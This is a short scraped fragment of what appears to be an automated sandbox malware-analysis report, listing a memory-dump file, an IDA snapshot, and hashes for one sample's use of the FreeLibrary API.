                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: Wu
                                                                                                                                                                                                                                                                • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                                                • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                                • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E